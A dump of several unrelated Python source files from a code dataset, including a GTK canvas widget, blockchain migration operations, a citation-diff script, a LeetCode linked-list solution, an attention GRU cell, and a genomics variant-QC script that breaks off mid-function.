startangle, endangle, anticlockwise, draw_context)\n draw_context.rotate(rotation)\n draw_context.identity_matrix()\n draw_context.restore()\n\n def rect(self, x, y, width, height, draw_context, *args, **kwargs):\n draw_context.rectangle(x, y, width, height)\n\n # Drawing Paths\n\n def apply_color(self, color, draw_context, *args, **kwargs):\n if color is not None:\n draw_context.set_source_rgba(*native_color(color))\n else:\n # set color to black\n draw_context.set_source_rgba(0, 0, 0, 1.0)\n\n def fill(self, color, fill_rule, preserve, draw_context, *args, **kwargs):\n self.apply_color(color, draw_context)\n if fill_rule == \"evenodd\":\n draw_context.set_fill_rule(cairo.FILL_RULE_EVEN_ODD)\n else:\n draw_context.set_fill_rule(cairo.FILL_RULE_WINDING)\n if preserve:\n draw_context.fill_preserve()\n else:\n draw_context.fill()\n\n def stroke(self, color, line_width, line_dash, draw_context, *args, **kwargs):\n self.apply_color(color, draw_context)\n draw_context.set_line_width(line_width)\n if line_dash is not None:\n draw_context.set_dash(line_dash)\n draw_context.stroke()\n draw_context.set_dash([])\n\n # Transformations\n\n def rotate(self, radians, draw_context, *args, **kwargs):\n draw_context.rotate(radians)\n\n def scale(self, sx, sy, draw_context, *args, **kwargs):\n draw_context.scale(sx, sy)\n\n def translate(self, tx, ty, draw_context, *args, **kwargs):\n draw_context.translate(tx, ty)\n\n def reset_transform(self, draw_context, *args, **kwargs):\n draw_context.set_matrix(self.original_transform_matrix)\n\n # Text\n\n def write_text(self, text, x, y, font, draw_context, *args, **kwargs):\n # Set font family and size\n if font:\n write_font = font\n elif self.native.font:\n write_font = self.native.font\n write_font.family = self.native.font.get_family()\n write_font.size = self.native.font.get_size() / Pango.SCALE\n draw_context.select_font_face(write_font.family)\n draw_context.set_font_size(write_font.size)\n\n # Support writing multiline text\n for line in text.splitlines():\n width, height = self.measure_text(line, write_font)\n draw_context.move_to(x, y)\n draw_context.text_path(line)\n y += height\n\n def measure_text(self, text, font, tight=False):\n layout = self.native.create_pango_layout(text)\n\n layout.set_font_description(self.native)\n ink, logical = layout.get_extents()\n if tight:\n width = (ink.width / Pango.SCALE) - (ink.width * 0.2) / Pango.SCALE\n height = ink.height / Pango.SCALE\n else:\n width = (logical.width / Pango.SCALE) - (logical.width * 0.2) / Pango.SCALE\n height = logical.height / Pango.SCALE\n\n return width, height\n\n def get_image_data(self):\n self.interface.factory.not_implemented(\"Canvas.get_image_data()\")\n\n # Rehint\n\n def rehint(self):\n # print(\"REHINT\", self, self.native.get_preferred_width(), self.native.get_preferred_height())\n # width = self.native.get_preferred_width()\n # height = self.native.get_preferred_height()\n pass\n","sub_path":"gtk/src/toga_gtk/widgets/canvas.py","file_name":"canvas.py","file_ext":"py","file_size_in_byte":8621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"165666632","text":"import functools\n\nfrom solc import compile_source\n\nfrom web3.utils.string import (\n force_text,\n)\n\nfrom populus.utils.transactions import (\n wait_for_transaction_receipt,\n get_contract_address_from_txn,\n)\nfrom populus.utils.contracts import (\n get_contract_link_dependencies,\n link_contract,\n)\n\nfrom .registrar import (\n REGISTRAR_SOURCE,\n)\nfrom .deferred import (\n Address,\n resolve_if_deferred_value,\n)\n\n\nclass Operation(object):\n \"\"\"\n Base class that all migration operations inherit from.\n \"\"\"\n def execute(self, **kwargs):\n raise NotImplementedError(\n \"The `execute` method must be implemented by each Operation subclass\"\n )\n\n\nclass RunPython(Operation):\n \"\"\"\n A migration operation that runs custom python code for executing operations\n that don't fit within the provided operation canvas.\n \"\"\"\n def __init__(self, callback):\n self.callback = callback\n\n def execute(self, **kwargs):\n return self.callback(**kwargs)\n\n\nclass SendTransaction(Operation):\n \"\"\"\n A migration operation that sends a transaction.\n \"\"\"\n transaction = None\n timeout = 30\n\n def __init__(self, transaction, timeout=120):\n self.transaction = transaction\n if timeout is not None:\n self.timeout = timeout\n\n def execute(self, chain, **kwargs):\n transaction_hash = chain.web3.eth.sendTransaction(self.transaction)\n if self.timeout is not None:\n wait_for_transaction_receipt(\n chain.web3, transaction_hash, timeout=self.timeout,\n )\n return {\n 'transaction-hash': transaction_hash,\n }\n\n\nclass DeployContract(Operation):\n contract = None\n transaction = None\n timeout = None\n libraries = None\n verify = None\n\n def __init__(self,\n contract_name,\n transaction=None,\n arguments=None,\n verify=True,\n libraries=None,\n timeout=120):\n if libraries is None:\n libraries = {}\n\n self.contract_name = contract_name\n self.libraries = libraries\n\n if timeout is None and verify:\n raise ValueError(\n \"Invalid configuration. When verifying a contracts deployment, \"\n \"the timeout value must be set.\"\n )\n\n if transaction is None:\n transaction = {}\n\n if 'data' in transaction or 'to' in transaction:\n raise ValueError(\n \"Invalid configuration. You cannot specify `data` or `to` \"\n \"values in `DeployContract` transactions.\"\n )\n\n if arguments is None:\n arguments = []\n\n self.transaction = transaction\n self.arguments = arguments\n self.verify = verify\n\n if timeout is not None:\n self.timeout = timeout\n\n def execute(self, chain, compiled_contracts, **kwargs):\n contract_data = compiled_contracts[self.contract_name]\n\n all_known_contract_names = set(self.libraries.keys()).union(\n set(compiled_contracts.keys())\n )\n link_dependencies = get_contract_link_dependencies(\n contract_data['code'],\n all_known_contract_names,\n )\n\n if link_dependencies:\n # TODO: try to look these values up with the registrar.\n missing_libraries = set(self.libraries.keys()).difference(link_dependencies)\n if missing_libraries:\n raise ValueError(\n \"Missing necessary libraries for linking: {0!r}\".format(missing_libraries)\n )\n resolve_fn = functools.partial(\n resolve_if_deferred_value,\n chain=chain,\n )\n resolved_dependencies = {\n dependency_name: resolve_fn(value)\n for dependency_name, value\n in self.libraries.items()\n }\n code = link_contract(contract_data['code'], **resolved_dependencies)\n runtime = link_contract(contract_data['code_runtime'], **resolved_dependencies)\n else:\n code = contract_data.get('code')\n runtime = contract_data.get('code_runtime')\n\n ContractFactory = chain.web3.eth.contract(\n abi=contract_data['abi'],\n code=code,\n code_runtime=runtime,\n source=contract_data.get('source'),\n )\n\n deploy_transaction_hash = ContractFactory.deploy(\n self.transaction,\n self.arguments,\n )\n\n if self.timeout is not None:\n contract_address = get_contract_address_from_txn(\n chain.web3, deploy_transaction_hash, timeout=self.timeout,\n )\n if self.verify:\n code = chain.web3.eth.getCode(contract_address)\n if force_text(code) != force_text(ContractFactory.code_runtime):\n raise ValueError(\n \"An error occured during deployment of the contract.\"\n )\n return {\n 'contract-address': contract_address,\n 'deploy-transaction-hash': deploy_transaction_hash,\n 'canonical-contract-address': Address.defer(\n key='/'.join(('contract', self.contract_name)),\n value=contract_address,\n ),\n }\n\n return {\n 'deploy-transaction-hash': deploy_transaction_hash,\n }\n\n\nclass TransactContract(Operation):\n contract_name = None\n method_name = None\n arguments = None\n transaction = None\n\n timeout = None\n\n def __init__(self,\n contract_name,\n method_name,\n arguments=None,\n transaction=None,\n contract_address=None, # TODO: this should come from the resolver.\n timeout=120):\n self.contract_address = contract_address\n self.contract_name = contract_name\n self.method_name = method_name\n\n if arguments is None:\n arguments = []\n self.arguments = arguments\n\n if transaction is None:\n transaction = {}\n\n self.transaction = transaction\n\n if timeout is not None:\n self.timeout = timeout\n\n def execute(self, chain, compiled_contracts, **kwargs):\n contract_name = resolve_if_deferred_value(self.contract_name, chain=chain)\n contract_address = resolve_if_deferred_value(self.contract_address, chain=chain)\n\n contract_data = compiled_contracts[contract_name]\n contract = chain.web3.eth.contract(\n address=contract_address,\n abi=contract_data['abi'],\n code=contract_data['code'],\n code_runtime=contract_data['code_runtime'],\n source=contract_data['source'],\n )\n\n arguments = [resolve_if_deferred_value(arg, chain=chain) for arg in self.arguments]\n method_name = resolve_if_deferred_value(self.method_name, chain=chain)\n\n transactor = contract.transact(self.transaction)\n method = getattr(transactor, method_name)\n transaction_hash = method(*arguments)\n\n if self.timeout is not None:\n wait_for_transaction_receipt(\n chain.web3, transaction_hash, timeout=self.timeout,\n )\n\n return {\n 'transaction-hash': transaction_hash,\n }\n\n\nclass DeployRegistrar(DeployContract):\n def __init__(self, **kwargs):\n super(DeployRegistrar, self).__init__(\n contract_name=\"Registrar\",\n **kwargs\n )\n\n def execute(self, chain, **kwargs):\n kwargs.pop('compiled_contracts', None)\n compiled_contracts = compile_source(REGISTRAR_SOURCE)\n return super(DeployRegistrar, self).execute(\n chain=chain,\n compiled_contracts=compiled_contracts,\n **kwargs\n )\n","sub_path":"populus/migrations/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":7986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"273475058","text":"import scholarly\nimport pandas as pd\nimport sys\nfrom datetime import datetime\n\nif len(sys.argv) != 3:\n\tprint(\"Usage: diff.py old.csv new.csv\")\n\texit()\n\nfile1 = str(sys.argv[1])\nfile2 = str(sys.argv[2])\n\ncolumns = ['new_cites', 'cites', 'title', 'author', 'year', 'cites_per_year', 'eprint', \n'pages', 'publisher', 'url', 'id_citations', 'id_scholarcitedby', 'source', 'citedByUrl']\n\n\nupdate = pd.DataFrame(columns=columns)\n\ndf1 = pd.read_csv(file1) \ndf2 = pd.read_csv(file2) \n\nfor i in range(df1.shape[0]):\n\tpaper_id = df1.loc[i]['id_citations']\n\tpaper_scholar = df1.loc[i]['id_scholarcitedby']\n\tcites1 = df1.loc[i]['cites']\n\t#print(\"Search \" + paper_id + \" \" + df1.loc[i]['title'][0:20] + \" with \" + str(cites1) + \" cites\")\n\tcites2 = next(iter(df2.loc[df2['id_citations'] == paper_id]['cites']),'no match')\n\tif(cites2 == 'no match'):\n\t\tprint(\"Paper disappeared: \" + df1.loc[i]['title'][0:20])\n\t\tupdate = update.append(pd.Series([0, df1.loc[i]['cites'], df1.loc[i]['title'], df1.loc[i]['author'], df1.loc[i]['year'], df1.loc[i]['cites_per_year'], df1.loc[i]['eprint'], df1.loc[i]['pages'], df1.loc[i]['publisher'], df1.loc[i]['url'], df1.loc[i]['id_citations'], df1.loc[i]['id_scholarcitedby'], df1.loc[i]['source'], df1.loc[i]['citedByUrl']], index=update.columns), ignore_index=True)\n\telif(cites1 != cites2):\n\t\tprint(\"Paper \" + str(paper_scholar) + \" \" + df1.loc[i]['title'][0:20] + \" has gone from \" + \n\t\t\tstr(cites1) + \" to \" + str(cites2) + \" cites\")\n\t\tupdate = update.append(pd.Series([cites2, df1.loc[i]['cites'], df1.loc[i]['title'], df1.loc[i]['author'], df1.loc[i]['year'], df1.loc[i]['cites_per_year'], df1.loc[i]['eprint'], df1.loc[i]['pages'], df1.loc[i]['publisher'], df1.loc[i]['url'], df1.loc[i]['id_citations'], df1.loc[i]['id_scholarcitedby'], df1.loc[i]['source'], df1.loc[i]['citedByUrl']], index=update.columns), ignore_index=True)\n\nfor i in range(df2.shape[0]):\n\tpaper_id = df2.loc[i]['id_citations']\n\tpaper_scholar = df2.loc[i]['id_scholarcitedby']\n\tcites2 = df2.loc[i]['cites']\n\t#print(\"Search \" + paper_id + \" \" + df1.loc[i]['title'][0:20] + \" with \" + str(cites1) + \" cites\")\n\tcites1 = next(iter(df1.loc[df1['id_citations'] == paper_id]['cites']),'no match')\n\tif(cites1 == 'no match'):\n\t\tprint(\"New paper!\" + df2.loc[i]['title'][0:20])\n\t\tupdate = update.append(pd.Series([df2.loc[i]['cites'], 0, df2.loc[i]['title'], df2.loc[i]['author'], df2.loc[i]['year'], df2.loc[i]['cites_per_year'], df2.loc[i]['eprint'], df2.loc[i]['pages'], df2.loc[i]['publisher'], df2.loc[i]['url'], df2.loc[i]['id_citations'], df2.loc[i]['id_scholarcitedby'], df2.loc[i]['source'], df2.loc[i]['citedByUrl']], index=update.columns), ignore_index=True)\n\ntoday = datetime.today().strftime('%Y%m%d')\nfilename = \"update_\" + today + \".csv\"\nprint(\"Done. Saving to file... \" + filename)\nupdate.to_csv(filename,index=False)\n\n\n","sub_path":"diff.py","file_name":"diff.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"172047724","text":"## https://leetcode.com/problems/odd-even-linked-list/submissions/\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def oddEvenList(self, head: ListNode) -> ListNode:\n\n \n if head == None or head.next == None :\n return head\n \n Odd_head = head\n Even_head = head.next\n \n odd_temp = head\n even_temp = head.next\n \n while odd_temp.next and even_temp.next:\n \n if Even_head.next == None:\n return Odd_head\n break\n \n odd_temp.next = even_temp.next\n odd_temp = odd_temp.next\n \n even_temp.next = odd_temp.next\n even_temp = even_temp.next\n \n odd_temp.next = Even_head\n \n return Odd_head\n ","sub_path":"Leetcode/Medium/Odd even linked list.py","file_name":"Odd even linked list.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"652704915","text":"import random\nfrom math import pi, sin, cos\n\n\"\"\"Your job is to create better version of create_expression and\nrun_expression to create random art.\nYour expression should have a __str__() function defined for it.\"\"\"\n\nclass Expression:\n def __init__(self):\n self.commands = []\n\n def evaluate(self, x, y):\n value = 1\n for (command, coord) in self.commands:\n if command == \"one\" and coord == \"x\":\n value = pi * cos(pi * sin(pow(x, 2)))\n elif command == \"one\" and coord == \"y\":\n value = pi * sin(pi * cos(pow(y, 4)))\n elif command == \"two\" and coord == \"x\":\n value *= pow(cos(pi * x), 2)\n elif command == \"two\" and coord == \"y\":\n value *= cos(pi * y)\n elif command == \"three\" and coord == \"x\":\n value *= sin(pi * sin(pi * x))\n elif command == \"three\" and coord == \"y\":\n value *= sin(pi * sin(pi * y))\n\n return value\n\n def __str__(self):\n return str(self.commands)\n\ndef create_expression():\n \"\"\"This function takes no arguments and returns an expression that\n generates a number between -1.0 and 1.0, given x and y coordinates.\"\"\"\n #expr = lambda x, y: sin(x)\n #return expr\n\n expr = Expression()\n for _ in range(12):\n if random.random() > 0.5:\n x_or_y = \"x\"\n else:\n x_or_y = \"y\"\n\n if random.random() > 0.7:\n operator = \"one\"\n elif random.random() < 0.3:\n operator = \"two\"\n else:\n operator = \"three\"\n\n expr.commands.append([operator, x_or_y])\n\n return expr\n\n\n\ndef run_expression(expr, x, y):\n \"\"\"This function takes an expression created by create_expression and\n an x and y value. It runs the expression, passing the x and y values\n to it and returns a value between -1.0 and 1.0.\"\"\"\n return expr.evaluate(x, y)\n","sub_path":"random_art.py","file_name":"random_art.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"352847102","text":"import Levenshtein\n\nCUTOFF = 0.6\n\n# https://maxbachmann.github.io/Levenshtein/levenshtein.html\n# https://en.m.wikipedia.org/wiki/Levenshtein_distance\n# Normalized similarity is documented as (1 - normalized distance).\n# Normalized distance seems to be (raw_distance / combined length) * 2\ndef is_similar(string_a, string_b):\n if string_a == string_b: # shortcut\n return True\n return Levenshtein.ratio(string_a, string_b, score_cutoff=CUTOFF) > CUTOFF\n\n\ndef first_unknown(consider, history, match=is_similar):\n for candidate in consider:\n for past in history:\n if match(candidate, past):\n break # out of inner for loop\n else: # executed after loop if no break\n return candidate\n","sub_path":"api/similar.py","file_name":"similar.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"52147044","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 22 14:18:03 2020\n\n@author: Laura.Fiorentino\n\"\"\"\nimport csv\nimport itertools\n\ndef read_ssp(filename):\n variables = []\n ssp_dict = {}\n with open(filename) as file:\n for line in file:\n line_split = line.split(',')\n if len(line_split) < 3:\n continue\n new_variable = line_split[2]\n if new_variable in variables:\n ssp_dict[new_variable].append(line_split[3])\n ssp_dict[new_variable + '_time'].append(line_split[0]\n + ' ' + line_split[1])\n else:\n variables.append(new_variable)\n ssp_dict[new_variable + '_time'] = []\n ssp_dict[new_variable] = []\n ssp_dict[new_variable].append(line_split[3])\n ssp_dict[new_variable + '_time'].append(line_split[0]\n + ' ' + line_split[1])\n return ssp_dict\n\n\ndef write_csv(ssp_dict, new_filename):\n \"\"\" This function writes thew new csv file. Each column is a time then the\n corresponding variable\"\"\"\n with open(new_filename, 'w', newline='') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow(ssp_dict.keys())\n writer.writerows(itertools.zip_longest(*ssp_dict.values()))\n \ndef ssp2csv(logfile, csvfile):\n ssp_dict = read_ssp(logfile)\n write_csv(ssp_dict, csvfile)","sub_path":"ssp_fxns.py","file_name":"ssp_fxns.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"505660116","text":"# coding: utf-8\nimport tensorflow as tf\n\nclass Att_mGRUcell(object):\n def __init__(self, input, premise, d_input, d_premise, d_cell, d_att, initializer, l2=False, init_h=None):\n # var\n self.input = input # shape: [n_steps, n_samples, d_input],输入前对原始数据进行了变化处理\n self.premise = premise\n self.d_input = d_input\n self.d_premise = d_premise\n self.d_cell = d_cell\n self.d_att = d_att\n self.initializer = initializer\n\n self.type = 'gru' # Just for the using of 'tf.scan'\n\n if init_h is None: # 判断是否提供了hidden_state的初始值\n # the shape of init_h is [n_samples, d_cell]\n self.init_h = tf.matmul(self.input[0, :, :], tf.zeros([self.d_input, self.d_cell]))\n self.previous = self.init_h # initial state\n\n # parameters, each of which has W_x W_h b\n self.rgate = self.Gate()\n self.zgate = self.Gate()\n self.hh = self.Gate()\n\n # to speed up computation. W_x: [d_input+d_premise, 3*d_cell], W_h: [d_cell, 3*d_cell], b: [3*d_cell,]\n # W_x = [W_xr, W_xz, W_xc]\n # W_h = [W_hr, W_hz, W_hc]\n # b = ( [b_r.T, b_z.T, b_c.T] ).T\n self.W_x = tf.concat([self.rgate[0], self.zgate[0], self.hh[0]], axis=1) # 按行对齐\n self.W_h = tf.concat([self.rgate[1], self.zgate[1], self.hh[1]], axis=1)\n self.b = tf.concat([self.rgate[2], self.zgate[2], self.hh[2]], axis=0) # 按列对齐\n\n # Query weight\n self.W_c = tf.get_variable('W_c', [self.d_input, self.d_att], tf.float32)\n\n # Attention weights(additive attention)\n self.v = tf.get_variable('v', [self.d_att], tf.float32)\n self.W_q = tf.get_variable('W_q', [self.d_att, self.d_att], tf.float32)\n self.W_k = tf.get_variable('W_k', [self.d_premise, self.d_att], tf.float32)\n self.W_m = tf.get_variable('W_m', [self.d_cell, self.d_att], tf.float32)\n\n if l2:\n lst_W = [self.W_x, self.W_h, self.W_c, self.W_q, self.W_k, self.W_m]\n self.l2_loss = tf.add_n([tf.nn.l2_loss(v) for v in lst_W]) * 1e-4\n\n def Gate(self, bias=0.001):\n # Since we will use gate multiple times, let's code a class for reusing\n Wx = self.initializer([self.d_input + self.d_premise, self.d_cell])\n Wh = self.initializer([self.d_cell, self.d_cell])\n b = tf.Variable(tf.constant(bias, shape=[self.d_cell]), trainable=True)\n return Wx, Wh, b\n\n def Slice_W(self, W, n):\n # split W's after computing\n return W[:, n * self.d_cell: (n + 1) * self.d_cell] # 选取给定输入的特定列\n\n def Step(self, prev_h, current_state_right):\n # Query vector, [-1, n_hidden], based on the state_right\n q = tf.nn.tanh(tf.matmul(current_state_right, self.W_c))\n\n # Attention weights(additive attention), based on premise, q and the preceding hidden state of mLSTM\n temp = tf.nn.tanh(tf.expand_dims(tf.tensordot(q, self.W_q, axes=1), axis=1)\n + tf.tensordot(self.premise, self.W_k, axes=1)\n + tf.expand_dims(tf.tensordot(prev_h, self.W_m, axes=1), axis=1))\n scores = tf.tensordot(temp, self.v, axes=1) # [-1, seq_length, d_att] 'dot' [d_att,] => [-1, seq_length]\n alphas = tf.nn.softmax(scores) # [-1, seq_length]\n\n # Context vector, weighted-sum by the second dim\n context = tf.reduce_sum(self.premise * tf.expand_dims(alphas, axis=2), axis=1) # [-1, d_premise]\n\n current_x = tf.concat([context, current_state_right], axis=1) # the input of mLSTM, [-1, d_input+d_premise]\n\n # computing all gates, 包含四个子网络的结果\n states_x = tf.matmul(current_x, self.W_x) + self.b # [-1, 3*d_cell]\n states_h = tf.matmul(prev_h, self.W_h)\n\n # computing (4steps)\n r = tf.nn.sigmoid(self.Slice_W(states_x, 0) + self.Slice_W(states_h, 0)) # [-1, d_cell]\n z = tf.nn.sigmoid(self.Slice_W(states_x, 1) + self.Slice_W(states_h, 1))\n hh = tf.nn.tanh(self.Slice_W(states_x, 2) + r * self.Slice_W(states_h, 2)) # [-1, d_cell]\n current_h = (1-z) * prev_h + z * hh\n return current_h","sub_path":"Att_mGRUcell.py","file_name":"Att_mGRUcell.py","file_ext":"py","file_size_in_byte":4194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"188592044","text":"#!/usr/bin/env python\n\n\"\"\"\nEvaluate random forest and VQSR results against the truth data\n\"\"\"\n\nfrom os.path import join\nfrom typing import Optional\nimport logging\nfrom pprint import pformat\nimport click\nimport hail as hl\n\nfrom gnomad.utils.filtering import filter_to_clinvar_pathogenic\nfrom gnomad.variant_qc.evaluation import (\n compute_binned_truth_sample_concordance,\n compute_grouped_binned_ht,\n create_truth_sample_ht,\n)\nfrom gnomad.variant_qc.pipeline import create_binned_ht, score_bin_agg\n\nfrom joint_calling.utils import get_validation_callback\nfrom joint_calling import utils, resources\nfrom joint_calling import _version\n\nlogger = logging.getLogger('random_forest')\nlogger.setLevel('INFO')\n\n\n@click.command()\n@click.version_option(_version.__version__)\n@click.option(\n '--mt',\n 'mt_path',\n callback=get_validation_callback(ext='mt'),\n help='Path to the matrix table',\n)\n@click.option(\n '--rf-annotations-ht',\n 'rf_annotations_ht_path',\n callback=get_validation_callback(ext='ht'),\n help='RF annotations table (created by random_forest.py)',\n)\n@click.option(\n '--info-split-ht',\n 'info_split_ht_path',\n required=True,\n callback=get_validation_callback(ext='ht', must_exist=True),\n help='path to info Table with split multiallelics '\n '(generated by generate_info_ht.py --out-split-info-ht)',\n)\n@click.option(\n '--fam-stats-ht',\n 'fam_stats_ht_path',\n callback=get_validation_callback(ext='ht'),\n help='optional path to a Table with trio stats '\n '(generated by generate_variant_qc_annotations.py)',\n)\n@click.option(\n '--rf-result-ht',\n 'rf_result_ht_path',\n callback=get_validation_callback(ext='ht'),\n help='RF result table (created by random_forest.py)',\n)\n@click.option(\n '--vqsr-filters-split-ht',\n 'vqsr_filters_split_ht_path',\n callback=get_validation_callback(ext='ht'),\n help='Use VQSR training sites to train the RF (generated by load_vqsr.py)',\n)\n@click.option(\n '--out-bin-ht',\n 'out_bin_ht_path',\n required=True,\n help='When set, creates file annotated with bin based on rank of VQSR/RF score.',\n)\n@click.option(\n '--out-aggregated-bin-ht',\n 'out_aggregated_bin_ht_path',\n help='When set, creates a file with aggregate counts of variants based on bins.',\n)\n@click.option(\n '--run-sanity-checks',\n 'run_sanity_checks',\n is_flag=True,\n help='When set, runs ranking sanity checks.',\n)\n@click.option(\n '--n-bins',\n 'n_bins',\n help='Number of bins for the binned file (default: 100).',\n default=100,\n type=click.INT,\n)\n@click.option(\n '--n-partitions',\n 'n_partitions',\n type=click.INT,\n help='Desired base number of partitions for output tables',\n default=5000,\n)\n@click.option(\n '--bucket',\n 'work_bucket',\n required=True,\n help='path to write intermediate output and checkpoints. '\n 'Can be a Google Storage URL (i.e. start with `gs://`).',\n)\n@click.option(\n '--local-tmp-dir',\n 'local_tmp_dir',\n help='local directory for temporary files and Hail logs (must be local).',\n)\n@click.option(\n '--overwrite/--reuse',\n 'overwrite',\n is_flag=True,\n help='if an intermediate or a final file exists, skip running the code '\n 'that generates it.',\n)\ndef main( # pylint: disable=too-many-arguments,too-many-locals\n mt_path: str,\n rf_annotations_ht_path: Optional[str],\n info_split_ht_path: str,\n fam_stats_ht_path: str,\n rf_result_ht_path: Optional[str],\n vqsr_filters_split_ht_path: Optional[str],\n out_bin_ht_path: str,\n out_aggregated_bin_ht_path: str,\n run_sanity_checks: bool,\n n_bins: int,\n n_partitions: int,\n work_bucket: str,\n local_tmp_dir: str,\n overwrite: bool,\n): # pylint: disable=missing-function-docstring\n local_tmp_dir = utils.init_hail('variant_qc_evaluate', local_tmp_dir)\n\n if overwrite or not utils.file_exists(out_bin_ht_path):\n scores_ht = create_bin_ht(\n rf_annotations_ht=hl.read_table(rf_annotations_ht_path),\n info_split_ht=hl.read_table(info_split_ht_path),\n n_bins=n_bins,\n rf_results_ht=hl.read_table(rf_result_ht_path)\n if rf_result_ht_path\n else None,\n vqsr_filters_split_ht=hl.read_table(vqsr_filters_split_ht_path)\n if vqsr_filters_split_ht_path\n else None,\n )\n scores_ht = scores_ht.checkpoint(out_bin_ht_path, overwrite=True)\n else:\n scores_ht = hl.read_table(out_bin_ht_path)\n\n if run_sanity_checks:\n logger.info('Running sanity checks...')\n ht = scores_ht\n logger.info(\n ht.aggregate(\n hl.struct(\n was_biallelic=hl.agg.counter(~ht.was_split),\n has_biallelic_rank=hl.agg.counter(hl.is_defined(ht.biallelic_bin)),\n was_singleton=hl.agg.counter(ht.singleton),\n has_singleton_rank=hl.agg.counter(hl.is_defined(ht.singleton_bin)),\n was_biallelic_singleton=hl.agg.counter(\n ht.singleton & ~ht.was_split\n ),\n has_biallelic_singleton_rank=hl.agg.counter(\n hl.is_defined(ht.biallelic_singleton_bin)\n ),\n )\n )\n )\n\n if out_aggregated_bin_ht_path:\n if overwrite or not utils.file_exists(out_aggregated_bin_ht_path):\n logger.warning('Use only workers, it typically crashes with preemptibles')\n agg_ht = create_aggregated_bin_ht(\n ht=scores_ht,\n trio_stats_ht=hl.read_table(fam_stats_ht_path)\n if fam_stats_ht_path\n else None,\n work_bucket=work_bucket,\n )\n agg_ht.write(out_aggregated_bin_ht_path, overwrite=True)\n\n mt = utils.get_mt(mt_path)\n\n truth_gvcfs = dict(\n syndip=dict(\n s='syndip',\n gvcf='gs://cpg-reference/validation/syndip/truth/full.38.20180222.vcf.gz',\n ),\n NA12878=dict(\n s='NA12878',\n gvcf='gs://cpg-reference/validation/giab/truth/HG001_GRCh38_GIAB_highconf_CG-IllFB-IllGATKHC-Ion-10X-SOLID_CHROM1-X_v.3.3.2_highconf_PGandRTGphasetransfer.vcf.gz',\n ),\n )\n\n truth_dict = {\n truth_gvcfs['syndip']['s']: {\n 's': truth_gvcfs['syndip']['s'],\n 'truth_mt': hl.read_matrix_table(\n 'gs://cpg-reference/validation/syndip/truth/syndip.b38_20180222.mt'\n ),\n 'hc_intervals': hl.read_table(\n 'gs://cpg-reference/validation/syndip/regions/syndip_b38_20180222_hc_regions.ht'\n ),\n 'mt': None,\n 'ht': None,\n },\n truth_gvcfs['NA12878']['s']: {\n 's': truth_gvcfs['NA12878']['s'],\n 'truth_mt': hl.read_matrix_table(\n 'gs://cpg-reference/validation/giab/truth/HG001_GRCh38_GIAB_highconf_CG-IllFB-IllGATKHC-Ion-10X-SOLID_CHROM1-X_v.3.3.2_highconf_PGandRTGphasetransfer.mt'\n ),\n 'hc_intervals': hl.read_table(\n 'gs://cpg-reference/validation/giab/regions/HG001_GRCh38_GIAB_highconf_CG-IllFB-IllGATKHC-Ion-10X-SOLID_CHROM1-X_v.3.3.2_highconf_nosomaticdel_noCENorHET7_hc_regions.ht'\n ),\n 'mt': None,\n 'ht': None,\n },\n }\n\n truth_snames = [sn for sn in truth_gvcfs if sn in mt.s.collect()]\n if truth_snames:\n truth_dict = {k: v for k, v in truth_dict.items() if k in truth_snames}\n _truth_concordance(\n mt,\n overwrite,\n work_bucket,\n n_partitions,\n scores_ht,\n info_split_ht_path,\n n_bins,\n truth_dict,\n )\n\n\ndef _truth_concordance(\n mt,\n overwrite,\n work_bucket,\n n_partitions,\n scores_ht,\n info_split_ht_path,\n n_bins,\n truth_dict,\n):\n logger.info(f'Extracting truth samples from MT...')\n mt = mt.filter_cols(\n hl.literal([v['s'] for k, v in truth_dict.items()]).contains(mt.s)\n )\n mt = hl.experimental.sparse_split_multi(mt, filter_changed_loci=True)\n\n # Checkpoint to prevent needing to go through the large table a second time\n checkpoint_mt_path = join(work_bucket, 'tmp', 'genomes_split.mt')\n logger.info(f'Saving checkpoint to {checkpoint_mt_path}')\n mt = mt.checkpoint(checkpoint_mt_path, overwrite=overwrite)\n\n for truth_sample, truth_data in truth_dict.items():\n truth_samples_mt_path = join(work_bucket, 'truth_samples', f'{truth_sample}.mt')\n if not overwrite and utils.file_exists(truth_samples_mt_path):\n truth_data['mt'] = hl.read_matrix_table(truth_samples_mt_path)\n else:\n called_truth_mt = mt.filter_cols(mt.s == truth_dict[truth_sample]['s'])\n # Filter to variants in truth data\n called_truth_mt = called_truth_mt.filter_rows(\n hl.agg.any(called_truth_mt.GT.is_non_ref())\n )\n logger.info(\n f'Saving {truth_sample} called truth sample data to '\n f'{truth_samples_mt_path}'\n )\n called_truth_mt = called_truth_mt.naive_coalesce(n_partitions)\n called_truth_mt.write(truth_samples_mt_path, overwrite=True)\n truth_data['mt'] = called_truth_mt\n\n for truth_sample, truth_data in truth_dict.items():\n # Merging with truth data. Computes a table for each truth sample comparing\n # the truth sample in the callset vs the truth.\n truth_ht_path = join(work_bucket, 'truth_samples', f'{truth_sample}.ht')\n if not overwrite and utils.file_exists(truth_ht_path):\n truth_data['ht'] = hl.read_table(truth_ht_path)\n else:\n logger.info(\n f'Creating a merged table with callset truth sample and truth data '\n f'for {truth_sample}...'\n )\n\n # Load truth data\n mt = truth_data['mt']\n truth_hc_intervals = truth_data['hc_intervals']\n truth_mt = truth_data['truth_mt']\n truth_mt = truth_mt.key_cols_by(s=hl.str(truth_data['s']))\n\n # Remove low quality sites\n info_ht = 